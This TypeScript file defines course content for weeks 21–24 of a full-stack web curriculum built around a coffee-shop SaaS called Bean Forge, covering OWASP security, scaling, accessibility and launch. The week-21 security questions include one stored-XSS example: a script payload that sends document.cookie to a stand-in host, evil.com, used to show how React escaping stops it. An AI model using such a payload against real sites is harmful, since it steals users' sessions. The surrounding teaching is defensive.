import { rewriteWeek } from "../rewrite-week";

// full-stack-web W21-W24

rewriteWeek("full-stack-web", 21, {
  context: `Security is not a checklist. Every application that handles user data or money has the same set of threats, and most breaches happen because of well-known, well-documented vulnerabilities that were not addressed. This week you learn the OWASP Top 10 and how each applies to Bean Forge.

SQL injection: user-controlled input is included directly in SQL queries, allowing the attacker to modify the query. Parameterised queries (which Prisma uses by default) prevent this entirely — the parameter value is never interpreted as SQL. The vulnerability is using raw string concatenation: db.query("SELECT * FROM users WHERE email = '" + email + "'"). Prisma's ORM layer means you are safe if you use the API correctly. Watch for prisma.\$queryRaw — use template literal syntax where Prisma escapes the parameters, not string concatenation.

Cross-Site Scripting (XSS): an attacker injects malicious JavaScript into a page that other users view. In React, JSX automatically escapes text content — {userInput} is safe. The vulnerability is dangerouslySetInnerHTML or using the DOM API to set innerHTML directly. Never use dangerouslySetInnerHTML with user-supplied content unless you run it through a sanitisation library like DOMPurify first.

Cross-Site Request Forgery (CSRF): a malicious website tricks a user's browser into making authenticated requests to your application. Modern defences: SameSite=Strict or SameSite=Lax cookie attribute prevents the browser from including cookies on cross-site requests. The SameSite attribute is now the default in most browsers, making CSRF rare. Still, understand the attack.

Dependency vulnerabilities: your application is only as secure as its dependencies. Run npm audit regularly. Use automated tools (Dependabot, Snyk) to flag known CVEs in your dependency tree. Subscribe to security advisories for your major dependencies.

Security headers: a small middleware call that adds significant protection. Use the helmet package in Express: it sets Content-Security-Policy, X-Frame-Options (prevents clickjacking), Strict-Transport-Security (forces HTTPS), and other headers. In Next.js, configure security headers in next.config.ts.

Rate limiting: prevents brute-force attacks (trying millions of passwords), credential stuffing (using leaked credentials from other breaches), and scraping. Add rate limiting to authentication endpoints and any expensive endpoint.

Environment variables and secrets: never commit secrets to git. Use .env files locally (excluded via .gitignore) and environment variable management in production (Vercel env, Railway env, AWS Secrets Manager).`,

  pre_flight: `Install Helmet: npm i helmet. Install express-rate-limit: npm i express-rate-limit. Run npm audit on your project and look at the output. If there are vulnerabilities, check if a patch is available (npm audit fix). Read the OWASP Top 10 at owasp.org — just the descriptions, not the full guides. Know what each of the ten categories is.`,

  mastery_questions: [
    `A user can set their display name. It is shown to other users on their profile page. Explain how a stored XSS attack would work and how React protects you. The attack: a malicious user sets their display name to <script>document.location='https://evil.com?cookie='+document.cookie</script>. If this string is rendered as HTML in another user's browser, the script executes and steals their cookies. React's protection: JSX escapes HTML entities before inserting into the DOM. The malicious name is rendered as the literal text "&lt;script&gt;..." — the browser sees a string, not a script tag. This protection applies when you use {user.displayName}. It does not apply if you use dangerouslySetInnerHTML={{__html: user.displayName}} — never do that with user content.`,
    `Your login endpoint has no rate limiting. Describe the attack that is possible and what rate limiting prevents. A credential stuffing attack: the attacker has a list of 10 million email/password combinations leaked from another service. They make automated requests to your login endpoint, trying each pair. Without rate limiting, a bot can try thousands per second. With rate limiting (e.g., 5 attempts per IP per 15 minutes), the attacker would need years to try all combinations. Also implement account lockout after N failures per user account (not just per IP — attackers can rotate IPs).`,
    `Explain the difference between authentication and authorisation with a concrete Bean Forge example. Authentication: "who are you?" — the login flow where you verify the email and password, create a session, and establish that this is user ID 123. Authorisation: "what are you allowed to do?" — checking that user 123 has permission to access the admin panel or delete an order. A bug in authentication means someone else can log in as user 123. A bug in authorisation means user 123 can do things they should not be allowed to do (access another user's orders, reach admin-only endpoints). Both must be implemented correctly.`,
    `Your Bean Forge API receives a request: PATCH /orders/456 with body { status: "completed" }. What authorisation checks must happen before you process this? First, is the user authenticated (is there a valid session)? If not, return 401. Second, does order 456 exist? If not, return 404. Third, does the authenticated user have permission to update this order? If the user is a customer, they should not be able to mark orders as completed — that is staff/admin only. Check the user's role. If customer, return 403. If staff or admin, proceed with the update. Also: does order 456 belong to this user? If customer, they should only access their own orders. Add that check too.`,
  ],

  common_mistakes: [
    `Trusting user input at any layer. Validate on the client for UX (instant feedback), validate on the server for security. Client-side validation can be bypassed by sending raw HTTP requests. Server-side validation cannot.`,
    `Using object spread to update database records with user input: await prisma.user.update({ data: req.body }). This allows mass assignment — an attacker can include { role: "admin" } in the request body and promote themselves. Always explicitly list the fields you allow: { data: { name: req.body.name } }.`,
    `Not checking authorisation at the resource level. Checking that the user is authenticated (has a valid session) is not the same as checking that they are authorised to access THIS specific resource. Always verify that the requested resource belongs to or is accessible by the authenticated user.`,
    `Logging full error stack traces to the API response. Stack traces reveal your file structure, library versions, and code logic to potential attackers. Return generic error messages to clients; log the full error server-side.`,
    `Missing security headers. A single helmet() call in Express or a security headers configuration in next.config.ts adds meaningful protection against clickjacking, XSS (via CSP), and HTTPS downgrade attacks.`,
  ],

  debug_help: `Helmet is breaking your application (CSS or images not loading): Helmet's Content-Security-Policy is blocking inline styles or scripts. Configure the CSP to allow your specific origins: helmet({ contentSecurityPolicy: { directives: { defaultSrc: ["'self'"], styleSrc: ["'self'", "'unsafe-inline'"] } } }). Start with reportOnly: true to log violations without blocking, then tighten the policy. npm audit shows vulnerabilities but npm audit fix breaks things: some vulnerabilities are in transitive dependencies that you cannot upgrade directly. Read the advisory — is it actually exploitable in your usage? If not, add it to .nsprc or snyk ignore. If it is, find which dependency brings it in and pin to a safe version or find an alternative. Rate limiting is blocking legitimate users: lower the limit or add an allowlist for trusted IPs. Also consider using a sliding window (express-rate-limit's windowMs) so users are not blocked for a full 15 minutes after 5 attempts.`,

  ai_assist: [
    `"Audit this Express route handler for security vulnerabilities: [paste code]. Identify: SQL injection risks, missing input validation, authorisation gaps, information leakage in error responses, and any other issues."`,
    `"Write a Content-Security-Policy header for a Next.js app that uses: Stripe.js (js.stripe.com), Google Fonts (fonts.googleapis.com, fonts.gstatic.com), and inline styles from Tailwind CSS. Use nonces for inline scripts."`,
    `"I have a PATCH /users/:id endpoint. Write the authorisation logic that: checks the user is authenticated, checks the target user exists, checks the authenticated user is either the target user themselves OR an admin, and rejects mass assignment by only allowing specific fields to be updated."`,
  ],

  stretch: [
    `Run OWASP ZAP (a free security scanner) against your Bean Forge development instance. Fix the vulnerabilities it identifies. This is what security teams use to find issues before attackers do.`,
    `Implement Content Security Policy with nonces for your Next.js app. A nonce is a random value generated per request and added to the CSP header and to inline script tags. This allows specific inline scripts while blocking injected ones. Next.js middleware can generate nonces.`,
    `Add a security.txt file at /.well-known/security.txt. This tells security researchers how to responsibly disclose vulnerabilities they find. Include a contact email and a PGP public key for encrypted reports.`,
  ],
});

rewriteWeek("full-stack-web", 22, {
  context: `Most applications never need to scale to millions of users. But understanding scaling teaches you how databases, networks, and servers actually work — knowledge that makes you a better developer even for small applications. And if your application does grow, you should know the sequence of bottlenecks you will hit and how to address each.

The first scaling bottleneck is almost always the database. Databases handle reads and writes; reads are much more common (in a typical web app, 90%+ of requests are reads). The first tool: read replicas. You keep one primary database that handles writes. You create one or more replicas (copies that stay in sync with the primary) and route read queries to them. This multiplies your read capacity. With Prisma, you configure a datasource for the read replica and use it for read-only queries.

Database indexing is the highest-ROI performance optimisation in most applications. Without an index, every query scans every row in the table. An index is a data structure (usually a B-tree) that the database maintains separately, allowing lookups in O(log n) instead of O(n). Add indexes to columns you filter or sort by frequently. Check slow queries with EXPLAIN ANALYZE in PostgreSQL — queries with "Seq Scan" on large tables usually need an index. The cost: indexes take disk space and slow down writes slightly (the index must be updated on every write). Do not add indexes speculatively — add them when you have evidence of a slow query.

Horizontal scaling: running multiple instances of your application server behind a load balancer. Stateless applications (no in-memory state, sessions stored in the database or Redis) scale horizontally without issues — any instance can handle any request. Stateful concerns (WebSocket connections, in-memory caches) do not scale horizontally without coordination (Redis adapter for Socket.IO, shared Redis cache).

Caching: serving responses from memory instead of recalculating them. Redis is the standard in-memory data store for caching. Cache database query results for data that does not change often. Cache rendered HTML for pages that are the same for all users. Cache external API responses. Always define a TTL (time to live) — stale data is usually better than slow responses, up to a point.

CDN for static assets: images, JavaScript bundles, CSS. Already covered in W18 — but at scale, this removes significant load from your servers.`,

  pre_flight: `Install ioredis: npm i ioredis. Create a free Redis instance on Upstash (upstash.com — free tier, no credit card required, Redis-compatible REST API). Add REDIS_URL to your .env. Read the PostgreSQL EXPLAIN ANALYZE documentation. Run EXPLAIN ANALYZE on a few of your existing queries to see whether they are doing sequential scans.`,

  mastery_questions: [
    `You have a query that fetches all orders for a user: SELECT * FROM orders WHERE userId = $1 ORDER BY createdAt DESC. The orders table has 2 million rows. This query takes 3 seconds. What do you do? Run EXPLAIN ANALYZE — it will show a sequential scan with cost estimated at thousands. Add an index: CREATE INDEX idx_orders_userid ON orders(userId). PostgreSQL can now jump directly to the rows for that userId. For the ORDER BY, a composite index on (userId, createdAt DESC) is even better — the database gets the results in order without a sort step. After adding the index, EXPLAIN ANALYZE should show an "Index Scan" and the query should take milliseconds.`,
    `Your application server has 2GB of RAM and is using 1.8GB under peak load. You want to scale horizontally — run 3 instances behind a load balancer. What must be true about your application for this to work? The application must be stateless: no data that must be shared between instances stored in process memory. Sessions must be stored in the database or Redis (not in-process memory). Any caches must be in Redis (not in-process LRU caches — each instance would have its own). File uploads must go directly to S3, not to the server's local filesystem. WebSocket connections need the Redis adapter. If all of these are met, instances are interchangeable and the load balancer can route any request to any instance.`,
    `You cache the menu for Bean Forge in Redis with a 1-hour TTL. An admin updates a menu item. How do users see the change before the hour expires? Cache invalidation on update. When the admin saves the menu item change, your server calls redis.del('menu:all') to delete the cached value. The next request finds no cache entry and fetches from the database, warming the cache again. This is the "invalidate on write" pattern. The alternative is "write-through caching": update the cache at the same time you update the database. Both work; invalidate-on-write is simpler.`,
    `Your load balancer health check hits /api/health every 10 seconds. If health check fails 3 times in a row, the instance is removed from the rotation. What should your health check endpoint return and how should the load balancer behave? The endpoint returns 200 if the instance is healthy (database reachable, Redis reachable), 503 if not. The load balancer removes unhealthy instances. But: if all instances become unhealthy simultaneously (shared database goes down), removing all instances causes an outage. Consider whether the health check should return 200 even when the database is down (at least the instance can serve cached responses) — this is a judgment call based on whether partial degradation is better than a 502.`,
  ],

  common_mistakes: [
    `Adding indexes to every column "just in case." Indexes cost write performance and storage. Add them when you have a slow query, not speculatively. One correctly placed index on a frequently-queried column has more impact than ten indexes on rarely-queried ones.`,
    `Caching with no TTL or an infinite TTL. Cached data becomes stale. Always set a TTL appropriate to how often the data changes. Menu items: cache for 1 hour with invalidation on update. User profiles: cache for 5 minutes. Real-time stock levels: do not cache.`,
    `N+1 database queries at scale. Fetching a list of 100 orders and then making one query per order to get the customer name is 101 queries instead of 1. This is invisible at small scale and catastrophic at large scale. Use Prisma include to load related data in one query.`,
    `Premature optimisation. Do not add Redis, read replicas, and horizontal scaling before you have evidence that you need them. Measure first: add slow query logging to your database, track request latency in your APM, find the actual bottleneck. Premature scaling adds complexity and cost.`,
    `Not load testing before scaling decisions. Deploy a load testing tool (k6, Artillery, or Locust) against your staging environment. Simulate 100, 500, 1000 concurrent users. Find where things break before they break in production.`,
  ],

  debug_help: `Redis cache misses on every request: check that your Redis connection is actually connecting — log the result of redis.ping() on startup. Check that you are using the same cache key for writing and reading. Key typos are common. Query is still slow after adding an index: run EXPLAIN ANALYZE again. If the database is not using your index, it may be choosing a sequential scan because the table is small (the planner thinks it is faster) or because the query involves a function on the column (WHERE LOWER(email) = ... prevents index use — create a functional index instead). Load balancer is routing all traffic to one instance: check the load balancing algorithm. Round-robin distributes evenly. Least connections routes to the instance with fewest open connections, which is better for uneven request durations.`,

  ai_assist: [
    `"I have these slow PostgreSQL queries: [paste queries and EXPLAIN ANALYZE output]. Recommend which indexes to add, explain why each index helps, and show the CREATE INDEX statements."`,
    `"Write a Redis caching wrapper for a Prisma query in TypeScript. It takes a cache key, a TTL in seconds, and an async function that returns data. On the first call, it runs the function and stores the result in Redis. On subsequent calls, it returns the cached value. On cache miss or error, it falls back to the function."`,
    `"Generate a k6 load test script for my Bean Forge application that simulates: 50 virtual users browsing the menu, 20 users logging in and placing orders, and 5 users hitting the admin panel. Run for 5 minutes and measure p95 and p99 response times."`,
  ],

  stretch: [
    `Implement connection pooling for your PostgreSQL database using PgBouncer (or Prisma Accelerate, which includes connection pooling). Serverless deployments (Vercel) open a new database connection on every function invocation — connection pooling prevents you from exhausting PostgreSQL's connection limit under load.`,
    `Set up a read replica on Neon (neon.tech) and configure Prisma to route read queries to the replica and writes to the primary. Measure the latency difference between primary and replica queries.`,
    `Write a cache-aside implementation with stale-while-revalidate behaviour. When a cached value is within 10% of its TTL, return the stale value immediately but trigger a background refresh. This eliminates cache stampedes (many requests all arriving at once when the cache expires).`,
  ],
});

rewriteWeek("full-stack-web", 23, {
  context: `The last 5% of polish is what users notice most. A technically correct application that has rough edges — janky animations, confusing error states, unclear loading feedback, inconsistent spacing — feels unfinished. Users make judgments about quality from these details, not from the underlying code. This week you go through Bean Forge with a fine-tooth comb and fix everything that makes it feel like a side project instead of a product.

Accessibility: your application must work for users who navigate with a keyboard, use a screen reader, or have colour vision deficiencies. Keyboard navigation: every interactive element (buttons, links, form fields, modals) must be reachable and operable with Tab, Enter, and Escape. Focus indicators must be visible (do not remove the outline without replacing it). Modal dialogs must trap focus inside them when open. Screen readers: use semantic HTML (nav, main, section, button, not div for everything). Add ARIA labels where the visual context is not available to screen readers (icon buttons need aria-label). Colour contrast: text must have at least 4.5:1 contrast ratio against its background (WCAG AA). Test with the WebAIM Contrast Checker.

Error states: every form submission, every data fetch, every user action can fail. Design and implement the error states explicitly. An error message must tell the user what went wrong and what they can do about it. "An error occurred" is not an error message. "Your card was declined — please try a different payment method" is.

Empty states: when a list has no items, show a helpful empty state that explains why and what the user can do. The orders page for a new user with no orders should not show a blank white space — it should explain that there are no orders yet and link to the menu.

Loading states: use skeletons (placeholder shapes) instead of spinners for content that has a known layout. A skeleton shows the layout while data loads, preventing layout shift and looking more professional than a spinner in the middle of the page.

Micro-interactions: small animations that give feedback. A button that compresses slightly when pressed. A form field that shakes when validation fails. A toast that slides in from the corner. These are 1-2 hours of work that make the application feel alive. Use Framer Motion or CSS transitions.`,

  pre_flight: `Install the axe browser extension (axe DevTools in Chrome) for accessibility testing. Install Framer Motion for animations: npm i framer-motion. Have the WebAIM Contrast Checker bookmarked (webaim.org/resources/contrastchecker). Know how to use Chrome DevTools Accessibility panel (Elements > Accessibility tab) to inspect the accessibility tree. Run your application and go through every page manually with Tab key navigation — note every place where focus is lost or the wrong element is focused.`,

  mastery_questions: [
    `You have a button that opens a dialog modal. When the dialog opens, the user presses Tab. Where should focus go and what should Tab behaviour be inside the modal? When the modal opens, focus must move to the first focusable element inside the modal (or the modal itself if it has tabIndex={0}). While the modal is open, Tab should cycle through focusable elements inside the modal only — focus must not escape to elements behind the modal. When the modal closes (Escape key or close button), focus must return to the button that opened it. This is focus trapping. Use the focus-trap-react library or implement it manually with a ref and a keydown listener.`,
    `You are building a search results list. The search query triggers a loading state while fetching. What should the UI show, and how do you handle the transition? Show a skeleton: a set of grey placeholder shapes that match the layout of a result item — a rectangle for the image, a wider rectangle for the title, a narrower one for the description. When results arrive, replace the skeletons with real content using a fade-in transition. If there are no results, show the empty state. If the fetch errors, show an error state with a "Try again" button. Every async operation has three states — loading, success, error — and all three must be designed and implemented.`,
    `A user fills in a 10-field form and submits it. Validation fails. Where do the error messages appear, and how do you handle focus? Error messages must appear adjacent to the field that failed, not just at the top of the form. Each error message is associated with its field via aria-describedby (the input has aria-describedby="field-name-error" and the error span has id="field-name-error"). The screen reader reads the error when the user focuses the field. On submission failure, focus should move to the first field with an error. For the error summary at the top of the form (if you have one), each item links to the field it describes.`,
    `Your site has a purple button (#6B46C1) on a white background. Is this accessible? What is the contrast ratio? #6B46C1 on white has a contrast ratio of approximately 5.9:1. WCAG AA requires 4.5:1 for normal text, 3:1 for large text (18pt+) and UI components. A button passes for normal text at this ratio. WCAG AAA requires 7:1 — this button would not pass AAA. Use the WebAIM Contrast Checker to verify before committing colour choices.`,
  ],

  common_mistakes: [
    `Removing the CSS outline on focus without providing an alternative. outline: none removes the browser's built-in focus indicator. Screen keyboard users and keyboard users lose all visual feedback about which element is focused. Replace it with a custom :focus-visible style: outline: 2px solid #6B46C1; outline-offset: 2px.`,
    `Using colour alone to communicate status. A red error message with no other indicator (icon, text, label) is invisible to colour-blind users. Always pair colour with another indicator: an icon, different text, or a border.`,
    `Abrupt content transitions. When new content loads (search results arrive, a panel slides in), sudden layout changes feel janky. Use Framer Motion's AnimatePresence and layout animations to make additions and removals smooth.`,
    `Generic error messages that do not help. "Something went wrong" is not an error message. Tell the user what failed and what they can do: "Your session expired — please sign in again" with a "Sign In" link. "We could not connect to the payment system — please try again in a few minutes."`,
    `Not testing on mobile. Development happens on a laptop. Users use phones. Test on real devices (or Chrome DevTools device emulation) at every stage. Touch targets must be at least 44x44px (iOS HIG) — small icon buttons fail this. Scrollable areas that clip on mobile are invisible in desktop development.`,
  ],

  debug_help: `axe reports "Images must have alternate text": add an alt attribute to all img tags. For decorative images (icons, decorative backgrounds), use alt="" — screen readers skip elements with empty alt. For meaningful images, describe what the image conveys. Framer Motion animations cause layout shift: use layout prop on animated elements to let Framer Motion handle size changes. Use AnimatePresence to animate elements that enter and leave the DOM. Button is not reachable by keyboard: if you used a div or span instead of a button element, add tabIndex={0} and an onKeyDown handler for Enter and Space. Or better: use a real button element — it gets keyboard focus for free. Focus trap not working in modal: check that all focusable elements in the modal are within the trap boundary. Elements with display:none or visibility:hidden are not focusable and are correctly skipped.`,

  ai_assist: [
    `"Review this React component for accessibility issues: [paste component]. Identify: missing ARIA labels, incorrect semantic HTML, focus management problems, keyboard navigation issues, and colour contrast concerns. For each issue, explain the impact on users and provide the fix."`,
    `"Write a reusable Modal component in React that: traps focus inside the modal, moves focus to the modal heading when opened, returns focus to the trigger element when closed, closes on Escape key, and has the correct ARIA roles (role='dialog', aria-modal='true', aria-labelledby)."`,
    `"Write Framer Motion animations for these interactions: a list item that animates in when it appears (fade + slide from left), a button that shrinks on press, a form field that shakes horizontally when it has a validation error. Keep animations under 300ms."`,
  ],

  stretch: [
    `Run your entire application through the WAVE accessibility checker (wave.webaim.org) and the axe DevTools extension. Fix every error and warning. Then test with a real screen reader: VoiceOver on macOS (Cmd+F5) or NVDA on Windows (free). Navigate through your application without looking at the screen.`,
    `Implement skeleton loading for every data-fetching page in Bean Forge. Create a Skeleton component that renders grey rectangles. Compose skeletons to match the layout of the real content. Use Framer Motion to animate them with a shimmer effect.`,
    `Conduct a 30-minute unmoderated usability test. Ask a friend or family member to use Bean Forge to complete three tasks (browse the menu, sign up, place an order) while thinking aloud. Watch where they hesitate, get confused, or make mistakes. Fix the three biggest issues.`,
  ],
});

rewriteWeek("full-stack-web", 24, {
  context: `This is the week you stop building features and start shipping a product. Bean Forge has evolved from a static HTML page to a full-stack SaaS with authentication, payments, real-time updates, file uploads, and email. Week 24 is not about adding anything — it is about making everything you have built solid, documented, and ready for real users.

A real SaaS needs a public landing page, pricing page, and blog. It needs a production monitoring setup (Sentry, uptime monitoring, structured logs). It needs a runbook: a document that describes what to do when something breaks in production. It needs a privacy policy and terms of service (real legal documents — use a template generator like Termly or the EFF's model privacy policy, then have a lawyer review before you have real users). It needs an onboarding flow: what happens between a user signing up and them getting value from the product?

The capstone project: you will ship Bean Forge as a real, publicly accessible SaaS. Set a goal of 10 real users (not test accounts, not friends being polite — users who actually use the product). To get 10 users, you need to distribute it: post in relevant communities (Reddit communities for coffee shop owners, Product Hunt, Twitter/X, local business groups), reach out directly to small coffee shop owners, or write a blog post about building it. The constraint of real users forces every previous lesson into sharp focus: performance matters because users on slow connections will leave; security matters because real data is at stake; reliability matters because users expect the product to be there.

The capstone project for this track is not a toy. It is something you can put in your portfolio, link in job applications, and point to when asked to demonstrate full-stack experience. The code is on GitHub (public, with a clean README), the application is live on a real domain, and it has at least one paying subscriber (even if it is you, to prove the payment flow works end-to-end).`,

  pre_flight: `Buy a domain for Bean Forge (Namecheap or Cloudflare Registrar — Cloudflare's registrar charges at-cost with no markup). Connect it to Vercel. Set up SSL (Vercel handles this automatically). Create a Product Hunt account and draft a launch post. Write a README that explains what the project is, how to set it up locally, and how to deploy it. Add a CHANGELOG that lists major changes by week.`,

  mastery_questions: [
    `You have 10 users. One of them emails you at 2am saying "I can't log in." What is your process? Step 1: check your uptime monitor — is the site down? Step 2: check Sentry — is there an unhandled exception in the auth flow? Step 3: check your structured logs for login attempts from that user's email — did the attempt reach the server? What was the response? Step 4: try logging in yourself — does it work for you? Step 5: if you cannot reproduce it, ask the user for their browser, device, and any error message they saw. Step 6: if the site is down, follow your runbook for the incident type. If you can reproduce the bug, write a failing test first, then fix it.`,
    `A paying customer wants to cancel their subscription. What is the ideal user experience and what happens technically on the Stripe side? The ideal UX: the user can cancel from their account settings page with one click (or via the Stripe Billing Portal). They see when their access ends (end of billing period). They get a cancellation confirmation email. Technically: your server calls stripe.subscriptions.update(subscriptionId, { cancel_at_period_end: true }). This sets the subscription to cancel at the end of the current period rather than immediately. The user retains access until then. When the period ends, Stripe fires customer.subscription.deleted and your webhook handler sets isPro: false on the user.`,
    `A potential employer looks at your Bean Forge GitHub repository. What should they see in the first 2 minutes? A clear README with: what the project is (one sentence), a live demo link, a screenshot or GIF, the tech stack, and how to set it up locally. Clean commit history (not "wip", "fix", "stuff" — real commit messages that describe what changed and why). Folder structure that makes sense (not everything in /src). A .env.example file with all required environment variables listed (values as placeholders). Tests that pass (link to CI badge). No secrets in the repository. The package.json should have useful scripts: dev, build, test, lint. This is a portfolio piece — it should show professional habits.`,
    `You decide to migrate Bean Forge from your PostgreSQL database to a new version with a schema change. The old Users table has a name column (VARCHAR). You want to split it into firstName and lastName. How do you do this without downtime? Step 1: add firstName and lastName columns (nullable). Step 2: deploy code that writes to all three columns and reads from firstName/lastName if they exist, falls back to name. Step 3: run a migration script to backfill firstName and lastName from name for all existing rows. Step 4: deploy code that only reads from firstName and lastName. Step 5: make name nullable (in case there are rows the backfill missed). Step 6: after verifying the new columns are correct, drop the name column. This sequence means no downtime because each step is backward compatible with the code deployed at the time.`,
  ],

  common_mistakes: [
    `Shipping without a real domain. localhost:3000 is not a portfolio project. A real domain costs $10/year. Without it, you cannot demonstrate SSL, CDN, production deployment, custom email from your domain, or any of the production setup work this course covered.`,
    `Leaving test/placeholder content in the production application. Bean Forge Pro should not have "TODO: write pricing copy" on the pricing page. Sweep the application for test data, placeholder text (Lorem Ipsum), disabled console.log statements left in, and debug routes.`,
    `No onboarding flow. When a new user signs up, they see a blank state and leave. An onboarding flow (even just an email sequence: welcome email day 1, "here's how to add your first menu item" day 2, "here are 5 things you can do" day 5) dramatically improves activation.`,
    `Skipping the README. A repository without a README is a repository that does not get hired. Write it as if a developer who knows nothing about your project must set it up from scratch. Then have someone actually try — the gaps will be obvious.`,
    `Not sharing the project. A portfolio project that no one knows about does not help your career. Post in communities. Tweet about it. Write a blog post about what you learned. The ability to build and distribute a product is what makes a developer employable — demonstrate both.`,
  ],

  debug_help: `Production site is slow after launch: first check where the slowness is — is it the server (time to first byte is slow, check your APM), the database (slow queries, add indexes), or the frontend (large bundle, missing CDN for images). Use WebPageTest.org to get a detailed breakdown from a real location. Domain not connecting to Vercel: check the DNS records. Vercel requires either an A record pointing to their IP (for apex domains) or a CNAME pointing to cname.vercel-dns.com. DNS changes take up to 48 hours to propagate — use dns.google to check current propagation status. Stripe webhooks not firing in production: check the Stripe dashboard under Developers > Webhooks — the endpoint must be configured for your production URL (not localhost). Check the event log for failed deliveries. Users cannot create accounts in production: check that all required environment variables are set in Vercel (DATABASE_URL, NEXTAUTH_SECRET, etc.) and that the production database is accessible from Vercel's edge network.`,

  ai_assist: [
    `"Write a production-ready README for a SaaS application called Bean Forge. Include: project description, live demo link placeholder, tech stack, local setup instructions (prerequisites, env setup, database setup, run), deployment guide for Vercel, and a contributing section."`,
    `"I'm preparing to launch on Product Hunt. Write a product description (tagline under 60 characters, description under 260 characters), three key features (each under 100 characters), and a comment I can post as the maker that tells the story of why I built this."`,
    `"Write an onboarding email sequence for Bean Forge: Day 0 (welcome, confirm email), Day 1 (how to add your first menu item), Day 3 (you can now take orders online), Day 7 (upgrade to Pro for analytics). Each email should be short (under 150 words), specific, and have one clear call to action."`,
  ],

  stretch: [
    `Write a retrospective document. Looking back at 24 weeks: what was the hardest week and why? What would you do differently if you started over? What are you most proud of in the code? What technical debt exists that you would address next? This exercise builds engineering judgment — the ability to evaluate your own work critically is what separates junior from senior developers.`,
    `Open source Bean Forge on GitHub with an MIT license. Write a CONTRIBUTING.md guide. See if you can get one external contribution (a bug fix, a documentation improvement) from someone who found the project. Responding to an external PR — reviewing it, suggesting changes, merging it — is a skill most bootcamp graduates lack.`,
    `Submit Bean Forge to three public curated lists or directories: Product Hunt, Indie Hackers, and one relevant community subreddit. Track signups from each source using UTM parameters (/?utm_source=producthunt&utm_campaign=launch). After one week, look at which source drove the most signups. This is growth thinking applied to your own product.`,
  ],
});
